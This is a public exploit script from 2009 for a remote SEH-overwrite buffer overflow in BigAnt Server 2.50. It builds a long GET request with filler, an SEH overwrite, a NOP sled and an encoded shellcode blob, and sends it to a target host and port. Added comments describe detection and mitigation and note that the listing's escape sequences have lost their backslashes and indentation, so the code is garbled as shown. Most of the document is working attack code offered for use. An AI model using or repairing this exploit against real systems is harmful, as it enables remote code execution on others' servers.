
# Title : BigAnt Server 2.50 GET Request Remote BOF Exploit (SEH) Universal
# Published : 2009-09-15
# Author : hack4love


#!/usr/bin/python
# by hack4love
# BigAnt Server version 2.50 SEH Overwrite Universal
# discovered by Blake http://www.milw0rm.com/exploits/9673
# Tested on Windows XP SP2
# gratez to Blake
# use >> bigant.py 192.168.1.12 6660


import socket, sys

# Argument handling: exactly <ip> <port> is expected; anything else prints
# usage and exits. NOTE(review): the listing has lost its indentation and the
# backslashes of every escape sequence ("n", "x41", "rnrn"), so as rendered
# this is an archival record of the published exploit, not a runnable script.
if len(sys.argv)!= 3:
print "n[*] Usage: %s <ip> <port>n" % sys.argv[0]
sys.exit(0)

host = sys.argv[1]
port = int(sys.argv[2]) # port 6660 by default


# Shellcode blob exactly as published (hex escapes rendered without their
# backslashes, see note above). What it does when decoded is not determinable
# from this listing.
shellcode = (
"xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x37x49x49x49x49x49x49x49x51x5ax6ax41"
"x58x50x30x42x31x41x42x6bx42x41x51x32x42x42x32x41"
"x41x30x41x41x42x58x38x42x42x50x75x4bx59x4bx4cx59"
"x78x52x64x63x30x65x50x53x30x4ex6bx57x35x77x4cx6c"
"x4bx61x6cx63x35x73x48x67x71x48x6fx6ex6bx50x4fx45"
"x48x6ex6bx53x6fx61x30x73x31x38x6bx53x79x4ex6bx66"
"x54x6ex6bx46x61x38x6ex30x31x6bx70x6ex79x6ex4cx4f"
"x74x79x50x74x34x44x47x4fx31x59x5ax76x6dx55x51x59"
"x52x68x6bx4ax54x35x6bx71x44x65x74x37x74x31x65x4a"
"x45x6ex6bx73x6fx44x64x55x51x4ax4bx50x66x4cx4bx44"
"x4cx30x4bx6ex6bx53x6fx37x6cx46x61x58x6bx6cx4bx77"
"x6cx6ex6bx46x61x5ax6bx4fx79x31x4cx47x54x37x74x6a"
"x63x74x71x59x50x70x64x6ex6bx51x50x50x30x6ex65x4b"
"x70x72x58x64x4cx6cx4bx71x50x56x6cx4ex6bx52x50x57"
"x6cx6cx6dx4cx4bx63x58x73x38x5ax4bx45x59x4ex6bx4f"
"x70x4cx70x35x50x43x30x63x30x4cx4bx53x58x77x4cx73"
"x6fx56x51x48x76x53x50x66x36x4fx79x39x68x6fx73x39"
"x50x61x6bx30x50x61x78x4ax50x6cx4ax73x34x33x6fx45"
"x38x6dx48x49x6ex6cx4ax46x6ex76x37x69x6fx48x67x45"
"x33x73x51x72x4cx71x73x63x30x41")


# Request layout, per the author's own naming: 985 bytes of filler
# (presumably sized to reach the SEH record), then next_seh and seh, which
# together overwrite the exception-registration record (the handler address
# is commented as coming from MFC42.DLL), a 10-byte NOP sled, and the
# shellcode. For defenders this is the useful part: the trigger is a single
# GET line of well over 1 KB, dominated by repeated 0x41, sent to the BigAnt
# service port, which is trivial to flag on the wire or in server logs.
# Mitigation on the host side is the usual one for this class of overwrite:
# vendor fix/upgrade, plus SafeSEH/SEHOP and DEP, which the "Tested on
# Windows XP SP2" header implies were not in play.
payload = "x41" * 985
next_seh = "xebx06x90x90"
seh = "xc3x20xc4x6b" #MFC42.DLL
nops = "x90" * 10
sec = shellcode

print "[+] Connecting to %s on port %d" % (host,port)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Bare except: every failure (including KeyboardInterrupt) is reported as a
# connection error and the script exits with status 0, so a wrapper cannot
# tell success from failure by exit code.
try:
s.connect((host,port))
except:
print "[x] Error establishing connectionn"
sys.exit(0)

# One write, no read: the script never inspects the server's response, so it
# gives no indication of whether the target was affected.
print "[+] Sending payload"
s.send("GET " + payload + next_seh + seh + nops + sec + "rnrn")
s.close()

# www.Syue.com [2009-09-15]